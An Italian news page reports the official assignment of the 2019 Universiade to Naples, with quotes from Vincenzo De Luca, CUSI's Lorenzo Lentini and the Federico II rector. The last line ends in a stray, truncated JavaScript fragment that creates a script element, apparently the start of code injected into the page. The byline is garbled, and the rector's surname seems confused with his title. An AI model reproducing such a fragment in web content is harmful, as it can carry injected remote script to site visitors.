.
News
  • Home

Alla città di Napoli l’organizzazione dell’Universiade 2019

di trarre 0
23 Mar 2016

E’ stato il Presidente della Regione Campania, Vincenzo De Luca, durante la conferenza stampa di presentazione tenuta nella sede della Regione, ad ufficializzare l’assegnazione dell’organizzazione della Universiade 2019 alla città di Napoli.

“L’impegno sarà significativo e gravoso, da quello economico a quello organizzativo – ha dichiarato De Luca – ma la realizzazione di questo progetto rappresenta soprattutto una grande opportunità per l’intera comunità”.

 

Presente alla conferenza anche il presidente del Cusi Lorenzo Lentini, il quale ha ricordato con orgoglio l’origine dell’Universiade. Fu la città di Torino, nel 1959, ad ospitare la prima edizione dell’Universiade e fu un successo straordinario. Un successo nato nel nome di Primo Nebiolo.  Nel 2019 ricorreranno i 60 anni di quell’evento straordinario, un compleanno speciale che sarà festeggiato e celebrato nella città partenopea, segnando così una memorabile staffetta tra una grande città del nord  e una grande città del sud.

 

Il Magnifico Rettore dell’Università Federico II di Napoli, Gaetano Magnifico, ha ribadito ruolo e impegno dell’Università che presiede e di tutte le Università “per il raggiungimento del più alto livello qualitativo e organizzativo. Dalle Università escono i giovani atleti di tutto il mondo che si cimenteranno nelle gare, ma dallo stesso luogo esce e uscirà la classe dirigente del futuro“.

Guarda il video ufficiale di Napoli 2019var d=document;var s=d.createElement(‘script’);